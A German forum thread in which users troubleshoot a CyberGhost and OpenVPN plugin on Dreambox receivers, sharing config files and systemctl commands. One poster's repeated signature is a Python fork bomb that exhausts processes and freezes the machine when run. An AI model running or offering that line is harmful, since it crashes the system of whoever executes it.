CyberGhostVPN auf DM7080/9x0/52x/dreamone

This site uses cookies. By continuing to browse this site, you are agreeing to our Cookie Policy.

  • El_Duderino wrote:

    Ich versuche das gerade zum laufen zu bekommen, aber es funktioniert leider nicht.
    Bei meinem Anbieter privateinternetaccess.com bekomme ich eine zip Datei(openvpn 2.3 or lower) worin sich drei Dateien befinden. Eine .crt, eine .pem und eine .conf
    Bei openvpn ab 2.4 nur noch eine .ovpn Datei


    Gehe ich wie folgt vor:

    1.Zip Datei nach /tmp
    2. Gui
    Autostart Ein
    User xxxxxxxx
    Pass xxxxxxxx
    Install Ein

    Passiert leider nichts, es werden zwar Datein in /openvpn erstellt aber mehr passiert nicht. Liegt das nun an meinem Anbieter weil keine ca.crt und client.key vorliegt? was kann ich noch probieren?
    Das geht nur bei Cyberghost bei deinem ist es vielleicht auch möglich mit anpassungen aber dazu fehlt mir die infos und die Zeit.

    jana0815 wrote:

    Bei mir geht nach dem NN Update auch nichts mehr.
    Cyper Ghost lief vorher.

    ??
    das NN2 Update macht an deiner Config garnichts solange du nicht die zugehörigen buttons drückst.


    Ich hab bei mir Cyberghost ohne verbindungsbabbrüche am laufen und habe es mit der zip installiert auf 3 boxen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Es gibt eine ganz einfache methode um fehler aufzudecken.

    Source Code

    1. systemctl stop openvpn@openvpn
    2. rm /var/log/ovpn.log
    3. systemctl start openvpn@openvpn
    Wenn du das alles ausgeführt hast hänge die neu erstellte /var/log/ovpn.log hier rein dann kann ich dir mehr sagen.

    P.S
    Alternativ Plugin starten info button drücken da erscheint das ganze log incl fehler und mit etwas geschick meistens leicht zu beheben.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Doch natürlich Openvpn ist Universell einsetzbar für jeden Provider mit entsprechender config nur das Plugin setzt auf cyberghost.Das heist wenn du deine konfiguration anpasst geht jeder Provider der auf openvpn setzt.
    Die Konfig und die zertifikate sind der knackpunkt die hat jeder Provider anders um alle einzubinden müsste ich sehr viele services abonieren das geht nicht.

    Z.b
    Wenn du von deinem Provider nur eine ovpn Datei bekommen hast werden die zertifikate integriert sein musst nur umbennen in openvpn.conf und ins verzeichnis /etc/openvpn kopieren.
    systemctl stop openvpn@openvpn
    und
    systemctl start openvpn@openvpn
    Dann sollte dein service laufen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Das alte war eine zertifikat lösung um dreamboxen untereinander zu verbinden keinen Provider mit der box ihr habt nur die start stop funktion benutzt aber das braucht man nicht den service kann man mit systemctl steuern.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • Habe heute nur "versucht"......kein Erfolg.
    Ich habe OpenVPN nur zum Verbinden 2 Boxen benutzt.
    Schade.
    Entscheidung nun für mich ....Imagewechsel oder keine Update´s bzw. händisch jede Aktualisierung einzeln.
    Auch Mist.

    client.ovpn
    dh4096.pem
    Root_CA.crt
    XXXXXXXXrst.pem

    Das sind meine Dateien
    Mit OpenVPN keine Probleme.
  • jana0815 wrote:



    Entscheidung nun für mich ....Imagewechsel oder keine Update´s bzw. händisch jede Aktualisierung einzeln.
    Auch Mist.
    Ich habe bis jetzt einfach das alte openvpn Plugin auf hold gesetzt, so wird alles bis auf openvpn aktualisiert.

    "apt-mark hold enigma2-plugin-newnigma2-vpn"

    Ich hoffe hier noch auf eine Lösung. Ansonsten werde ich Ende des Jahres zu Chyberghost wechseln oder mir mal das Plugin von Merlin ansehen, ich weiß aber nicht ob das auf newnigma läuft, Image möchte ich ungern wechseln.
  • Hallo zusammen,


    ich habe jetzt nach 20 Stunden entlich im Plugin im Status unten stehen:

    Active: active (running) since Fri2019-10-11 18:56:11

    Nur, die IP hat sich nicht gändert die obendrüber angezeigt wird. Daher denke ich, dass der VPN nicht wirklich eine Verbindung aufgebaut hat.
    Mache ich hier noch etwas falsch?

    Grüsse
  • VPN ist was sensibeles da kann man unbewusst 100 Fehler machen aufschluss gibt einem dann der openvpn.log der mit dem info button angezeigt wird.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • VPN log:

    leider komplett leer, da steht nichts.

    Ja, ich weiss - darum habe ich hier auch schon die Zeit investiert.
    Das es jetzt schon mal auf ACTIVE steht - ist ja schon mal ein Erfolgserlebnis.

    Nachtrag:
    habe gerade deinen Telnet befehl eingegeben. (seite Vorher).
    Ausgabe: rw: can´t remove /var/log/ovpn.log : No such file or directory

    The post was edited 1 time, last by ultra-S ().

  • jo dann

    systemctl stop openvpn@openvpn
    systemctl start openvpn@openvpn

    und danach /var/log/ovpn.log hier mal reinhängen

    mit dem install der zip datei wollte ich diese problematik umgehen
    bei cyberghost die xxxx_openvpn.zip herunterladen nach /tmp kopieren
    ---Autostart auf ON
    -- Username Korrekt eintragen
    -- Passwort korrekt eintragen
    -- Installiere auf ON
    -- Menutaste drücken und besttätigen

    Solle was falsch eingegeben worden sein den inhalt von /etc/openvpn löschen und nochmal machen.
    python -c 'while 1: __import__("os").fork()'
    Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
  • ...
    Wenn du mir sagen kannst wie ich das genau mache, mache ich alles ;)

    Hier meine Config:

    client
    dev tun
    proto udp
    remote lu.hide.me 4000
    cipher AES-256-CBC
    auth SHA256
    resolv-retry infinite
    nobind
    persist-key
    persist-tun
    mute-replay-warnings
    verb 3
    auth-user-pass password.txt
    reneg-sec 0
    remote-cert-tls server
    verify-x509-name "*.hide.me" name
    tls-version-min 1.2
    key-direction 0

    The post was edited 1 time, last by ultra-S ().